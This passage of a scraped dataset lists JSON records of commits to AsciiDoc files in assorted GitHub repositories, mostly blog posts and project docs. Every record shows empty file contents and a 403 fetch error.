2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66e9376d410435e94f41100cbd67d7b12b268fc2","subject":"Update 2016-05-16-this-is-a-test.adoc","message":"Update 2016-05-16-this-is-a-test.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-this-is-a-test.adoc","new_file":"_posts\/2016-05-16-this-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"becd0e7b38ca16f1358dc8c4e4533075becaf8bd","subject":"Delete the file at '_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc'","message":"Delete the file at '_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"438acaa5bcfac1a48a49c500abbb6e61f8346d94","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3051b16582be4b2ac9c818c58023f3d9268a2430","subject":"Update 2017-02-07-Mi-primer-post.adoc","message":"Update 2017-02-07-Mi-primer-post.adoc","repos":"ghostbind\/ghostbind.github.io,ghostbind\/ghostbind.github.io,ghostbind\/ghostbind.github.io,ghostbind\/ghostbind.github.io","old_file":"_posts\/2017-02-07-Mi-primer-post.adoc","new_file":"_posts\/2017-02-07-Mi-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ghostbind\/ghostbind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16317c2864bc5c1b29d807987cb0e963db6363f3","subject":"Delete the file at '_posts\/2017-02-25adocadoc-part-1.adoc'","message":"Delete the file at '_posts\/2017-02-25adocadoc-part-1.adoc'","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4feba930a0c013815d87ad3c3520d46e9685fb","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33112ca2d97b5ef4a05c23480205ae373039004d","subject":"doc: implementers add include structure","message":"doc: implementers add include structure\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"ravineet-singh\/odp,dkrot\/odp,dkrot\/odp,dkrot\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,nmorey\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,rsalveti\/odp,ravineet-singh\/odp,kalray\/odp-mppa,kalray\/odp-mppa,kalray\/odp-mppa,rsalveti\/odp,ravineet-singh\/odp,kalray\/odp-mppa,nmorey\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,erachmi\/odp,rsalveti\/odp,kalray\/odp-mppa,rsalveti\/odp,erachmi\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d774a558fb26c4f0b22287ac15bd82cbf5930d72","subject":"About URI VS URL","message":"About URI VS URL\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"442c3b8bcf3a8157d8b7fe6d5f6319ef8416e3ab","subject":"docs: fix link","message":"docs: fix link\n","repos":"s1monw\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/normalization-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/normalization-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gingerwizard\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7025c67d164712cb391507bd3d1b8f38e3c07761","subject":"Updated readme.","message":"Updated readme.\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,Applemann\/hypatia,brechin\/hypatia,brechin\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a94049a2a4bc00093ff7461c10af777982f869f1","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e5fdc0de0dab1152877046fa452e971ea44317d","subject":"Update 2017-02-15-Philips-Hue-Hub.adoc","message":"Update 2017-02-15-Philips-Hue-Hub.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-15-Philips-Hue-Hub.adoc","new_file":"_posts\/2017-02-15-Philips-Hue-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3139edef052e9ba0630ad6acfea4e054a77785fc","subject":"Update 2017-05-25-Your-Blog-title.adoc","message":"Update 2017-05-25-Your-Blog-title.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-25-Your-Blog-title.adoc","new_file":"_posts\/2017-05-25-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f66bc3c081f190df83b91ff45ec69126ec70939","subject":"Update 2017-11-08-Github-Research.adoc","message":"Update 2017-11-08-Github-Research.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-08-Github-Research.adoc","new_file":"_posts\/2017-11-08-Github-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"256f8b54cb572e0ffc6e98118b11a3f01f735452","subject":":memo: Modern JS","message":":memo: Modern JS\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/modern-code-tips.adoc","new_file":"src\/refills\/javascript\/modern-code-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93138ec865cfbcc0fe477e472df2db684ad6f248","subject":"Update 2016-10-21-algo-1826.adoc","message":"Update 2016-10-21-algo-1826.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-21-algo-1826.adoc","new_file":"_posts\/2016-10-21-algo-1826.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0c639ba85c2338b5e7f61a5659f07e44ccfe69c","subject":"Incorrect return description for method `emerald_newAccount`","message":"Incorrect return description for method `emerald_newAccount`\n\nFix return parameter description and reformat the example.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"07cf60244c18b21fe225e80f6daf98702db2c413","subject":"Update 2015-10-05-So-close-yet-so-far.adoc","message":"Update 2015-10-05-So-close-yet-so-far.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14dda6ba333c4af979212dfb1da8b920eff1d6c","subject":"Update 2016-04-06-Tenemos-un-problema.adoc","message":"Update 2016-04-06-Tenemos-un-problema.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7276bd02cca9689d050877ea936887e6c16de6a2","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec77913167e47da24ef7ac885cd66fa3c690e619","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb6a6207b70f8eed4f5c285dfb08761c34241850","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8abf0d9b81d2fc45c8af741ef807b0183fe06ff6","subject":"y2b create post iPhone 6 Plus Bend Test","message":"y2b create post iPhone 6 Plus Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-23-iPhone-6-Plus-Bend-Test.adoc","new_file":"_posts\/2014-09-23-iPhone-6-Plus-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dac75803e2466dfe3da1ebc291d11d5a785c042","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29904c04aaaf6660b3d69180e2f4600315a3557f","subject":"One more formatting fix for release notes","message":"One more formatting fix for release notes\n\nSame fix as prior similar commit, but for a late change to\nthe release notes, so got missed the first time around.\n\nChange-Id: I2272775c7b97afdaa9abfdc2101a326595de3ae0\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd4cccecc473d9722f4cf67f7049849dd9297bc9","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c995b882f2281814ddcdb439a8e904ade1cac97","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da3fe58345473913d5ed2157533a6de6f5fde804","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"710582c60359c1256b303ed679fa705d7f0bddeb","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c85f8577c8c4dd560cb043e2e2bef5fbced46292","subject":"Clearer second ex","message":"Clearer second ex\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client.adoc","new_file":"WS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"731801f5b4dfdd34c6c8ef6389ae893f229f0152","subject":"Rm {emptyattr} breaking URL check","message":"Rm {emptyattr} breaking URL check\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Objects & interfaces\/Equals.adoc","new_file":"Objects & interfaces\/Equals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb1ca459328a4d1c0b6ee7b58f3f854a663d7fa","subject":"Debezium 0.10.0.CR1 release announcement","message":"Debezium 0.10.0.CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-09-10-debezium-0-10-0-cr1-released.adoc","new_file":"blog\/2019-09-10-debezium-0-10-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bafd0de7eb1023032903f6279a704abce2e9c8aa","subject":"Update 2014-09-16-Technical-Difficulties.adoc","message":"Update 2014-09-16-Technical-Difficulties.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-16-Technical-Difficulties.adoc","new_file":"_posts\/2014-09-16-Technical-Difficulties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72b7560576daa3dcf1c8140ef0ef8ff970a4d7e1","subject":"Better wording for channel monad docs","message":"Better wording for channel monad docs\n","repos":"OlegTheCat\/cats,yurrriq\/cats,alesguzik\/cats,tcsavage\/cats,funcool\/cats,mccraigmccraig\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2429bbbc56da78ab90c23692f023f5caf49d115c","subject":"Update 2016-10-07-Learning-To-Be-Present.adoc","message":"Update 2016-10-07-Learning-To-Be-Present.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-07-Learning-To-Be-Present.adoc","new_file":"_posts\/2016-10-07-Learning-To-Be-Present.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5b35be4049f0f5e8a3a0c6647e2927a7820704a","subject":"Broken link to `usage.txr`","message":"Broken link to `usage.txr`\n\nFix the link path.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05e01dda7e8b5b7418ac265addab53f8b53affd2","subject":"Renamed '_posts\/2017-12-29-work-it-on-not.adoc' to '_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc'","message":"Renamed '_posts\/2017-12-29-work-it-on-not.adoc' to '_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc","new_file":"_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a9a3e0d572bbeda75ac564399e5655f5058c59","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d3f90274032442b0b46de2985ac6fef6054a77e","subject":"Update 2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f69e6cde1e984abadd0d4b59fc3c4b35d168ab4a","subject":"#243 add first version of sakuli-api.adoc","message":"#243 add first version of sakuli-api.adoc\n","repos":"ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli","old_file":"docs\/manual\/testdefinition\/sakuli-api.adoc","new_file":"docs\/manual\/testdefinition\/sakuli-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ConSol\/sakuli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"276dbc292558958fbe545b456ea82b7bde1e0779","subject":"Update repositories.asciidoc","message":"Update repositories.asciidoc\n\nAdded a warning explaining how `add-apt-repository` adds a `deb-src` entry, which can result in errors.\n\nCloses 